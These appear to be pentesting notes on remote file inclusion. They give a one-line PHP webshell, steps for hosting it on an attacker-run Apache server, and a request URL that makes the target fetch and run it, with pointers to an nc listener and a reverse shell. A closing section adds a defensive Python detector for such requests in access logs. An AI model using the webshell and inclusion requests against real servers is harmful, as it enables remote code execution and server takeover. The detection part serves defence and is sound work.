RFI - Theory & basic commands
#Basics
Remote file inclusion (RFI)
1) Evil payload hosted on Kali + Apache server
2) nc listener to catch the revshell
…..file=http://192.168.177.119:8080/evil.txt
cat evil.txt
<?php system($_GET['cmd']); ?>
The 'cmd' GET parameter is passed to system(), so once the file is included, any command supplied in the URL is executed on the server.
3) Move evil.txt to /var/www/html/evil.txt,
then start the Apache server:
sudo systemctl start apache2
Check that it is up and running:
service apache2 status
Once hosted in /var/www/html, you can retrieve the evil webshell from the URL:
…file=http://192.168.119.177/evil.txt&cmd=ipconfig
#At this point, escalate by running a revshell on the target
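Seen from the defending side, the request shape above (an include parameter such as `file` whose value is a full URL) stands out in web server access logs. The following detection sketch is an added example, not part of the original notes; the log lines are constructed and `find_rfi_attempts` is a hypothetical helper name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# URL schemes PHP can fetch through include()/require() when allow_url_include is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Source address and request target of a combined-format access log entry.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def find_rfi_attempts(log_lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so file=http%3A%2F%2F... is caught as well.
        params = parse_qsl(query, keep_blank_values=True)
        for name, value in params:
            # Match only values that *start* with a scheme, to avoid flagging
            # ordinary text that merely mentions "http://".
            if value.strip().lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "src": m.group("src"),
                    "param": name,
                    "remote_url": value,
                    # Other parameters in the same request (e.g. cmd) help triage.
                    "other_params": [n for n, _ in params if n != name],
                })
    return findings

# Constructed sample log lines (documentation address ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2024:10:00:05 +0000] "GET /index.php?file=http://192.0.2.10/evil.txt&cmd=ipconfig HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Jan/2024:10:01:12 +0000] "GET /index.php?file=hTTp%3A%2F%2F192.0.2.10%3A8080%2Fevil.txt HTTP/1.1" 200 90',
    '203.0.113.4 - - [10/Jan/2024:10:02:00 +0000] "GET /search?q=what+is+http://+used+for HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

On the server itself, PHP only follows such URLs in include() when `allow_url_include` is enabled; it is off by default, so a hit in the logs against a host with that setting on deserves immediate attention.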
#Assorted tricks
#Extra server options